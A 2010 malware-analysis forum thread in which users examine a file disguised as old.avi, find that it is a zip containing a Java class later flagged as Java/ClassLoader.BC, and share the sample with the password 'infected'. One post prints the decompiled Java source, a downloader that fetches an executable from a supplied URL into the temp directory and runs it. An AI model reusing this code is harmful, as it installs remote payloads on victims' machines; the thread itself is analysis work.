A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #2591  by CloneRanger
 Wed Sep 01, 2010 4:32 pm
hxxp://ramgonet.com/smb/old.avi

Scanner results : Scanners did not find malware! - http://virscan.org/report/b8ef17dabdfbe ... 83cab.html

Described as a Java exploit, but i saw no evidence of that ? And it seems as if it's no .AVI either !

Identified differently in FF & IE

Quote from a fileinfo www
The ASF and ASX File Formats

Windows Media Player plays ASF and ASX files. ASF is a compressed file format that can store audio and video information and is designed to run over the Internet. ASF may also include slide shows and synchronizing events. The big advantage of this file is that it is delivered continuously and starts playing almost without a delay.

Converted old.avi to a text file and it's header is PK ? = PK old.txt

The PK (PEAK) file type is primarily associated with 'Audition' by Adobe Systems Incorporated. Previously Cool Edit Pro.

Also in there it mentions META-INF.

Tried to play it in VLC to see what might happen, and Zero !

Is this some type of new Meta File attempted exploit or ?

*

EDIT - Added VO Scan
Attachments
(1.27 KiB) Downloaded 59 times
ie.gif
ie.gif (18.87 KiB) Viewed 690 times
ff.gif
ff.gif (5.28 KiB) Viewed 690 times
 #2596  by nullptr
 Wed Sep 01, 2010 5:14 pm
It looks like a pkzip header, but my DNS servers are stuffed up, so I can't get hold of the original .avi file
 #2598  by CloneRanger
 Wed Sep 01, 2010 7:41 pm
@ nullptr

Hi
It looks like a pkzip header
That's what i originally thought, but due to the other media extensions listed, AVI/ASX/ it made me wonder if it was. So i looked PK up online and found a connection with media files = PEAK.

I expected people to be able to DL the file from the www i posted. Sorry you couldn't get it, so here it is.

PW = infected
Attachments
(1.22 KiB) Downloaded 50 times
 #2604  by nullptr
 Thu Sep 02, 2010 1:09 am
Just rename the original file to .zip
* Main.class - java
*MANIFEST.MF
Code: Select all
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

public class Main
{
  public static void main(String[] paramArrayOfString)
  {
    String str1 = Math.random() + ".exe";
    String str2 = System.getProperty("java.io.tmpdir");
    try
    {
      URL localURL = new URL(paramArrayOfString[3]);
      localURL.openConnection();
      InputStream localInputStream = localURL.openStream();

      FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
        localFileOutputStream.write(arrayOfByte, 0, i);
      localInputStream.close();
      localFileOutputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      String str3 = str2 + str1;
      localRuntime.exec(str3);
      return;
    }
    catch (Exception localException)
    {
    }
  }
}
 #2609  by CloneRanger
 Thu Sep 02, 2010 8:30 am
@ nullptr

So it was a Zip after all !

How did they expect people to get infected with the file as an .AVI extension ? I would imagine most peoples comps would try to open/run the file with a player, as mine did, and then nothing happens. I can't see many people out there changing it from .AVI to .ZIP and then opening it !

I changed it to .ZIP and opened it and found 2 files Main.class & MANIFEST.MF When i DC'd them ProcessGuard intercepted with a rundll32.exe prompt which i allowed. Then i get windows asking me to choose a program to open it with.

This all seems like a Very convoluted method to try and infect !!! Not much chance as it is i would have thought.

TIA
 #2628  by CloneRanger
 Fri Sep 03, 2010 6:13 pm
UPDATE

From Avira
Main.class 1.39 KB MALWARE

The file 'Main.class' has been determined to be 'MALWARE'. Our analysts named the threat Java/ClassLoader.BC. The term "JAVA/" denotes a virulent Java-Applet or Application
Still don't know how it was supposed to get executed etc as old.avi ?
 #2632  by wealllbe20
 Fri Sep 03, 2010 7:43 pm
More than likely an exploit for one specific application that play's avi files.

Maybe the product it is able to play avi files that are zipped?

I will do some searching around..